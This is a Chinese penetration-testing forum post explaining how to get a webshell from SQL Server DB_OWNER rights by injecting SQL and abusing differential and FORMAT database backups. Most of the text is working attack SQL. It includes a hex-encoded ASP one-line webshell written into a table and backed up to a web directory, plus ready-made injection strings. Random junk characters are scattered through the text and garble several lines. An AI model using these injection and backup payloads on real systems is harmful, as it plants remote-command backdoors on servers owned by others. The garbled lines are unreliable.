中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]

作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
, v. o+ p* ]: X/ u
( l6 Q  Z* `9 e8 x5 l一利用差异备份# s5 C/ {. Y5 j( v- i
加一个参数WITH DIFFERENTIAL
5 ]& w6 l0 |- z$ D: x; X
9 c, {, U5 G, {5 V9 G7 adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
) J4 U/ u9 f7 h6 fcreate table [dbo].[xiaolu] ([cmd] [image]);
  q; K4 N2 S8 Y# k9 [( k  r5 Pinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)- n1 U- ~) l  [& b) r! ]- @
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
2 H) T6 I' i* L1 d2 F0 C
7 k7 A$ i) m1 @8 S0 B二利用完全FORMAT
- k8 @/ v8 i& e8 U& i! r0 B加一个参数WITH FROMAT# s0 Z7 ]) @. m! u4 G
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以$ e) B0 m* p' V) \9 v+ |* P. P

9 Q1 ]! R' T( n5 t& i( d. f3 _declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s- B: g: r8 e9 K* [* q8 o- V
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  K, B1 p- J" \1 J. B9 Q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT4 \' O$ u$ d* ?6 H

# l: Y! f+ R- z% I! S总的来说就是那么简单几句,下面以备份数据库model为例子& Y9 {) ?0 b( R4 s4 E7 R; @
" s/ i0 x3 `) E. S: J& \
id=1;use model create table cmd(str image);insert into cmd(str) values (”)
: L; P, R5 P) H/ u. K) ^+ j3 T! t
0 S' F6 C. F( t3 Bid=1;backup database model to disk=’你的路径‘ with differential,format;–. _& o5 K& v8 R, m
1 b# m4 l- ^0 m





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2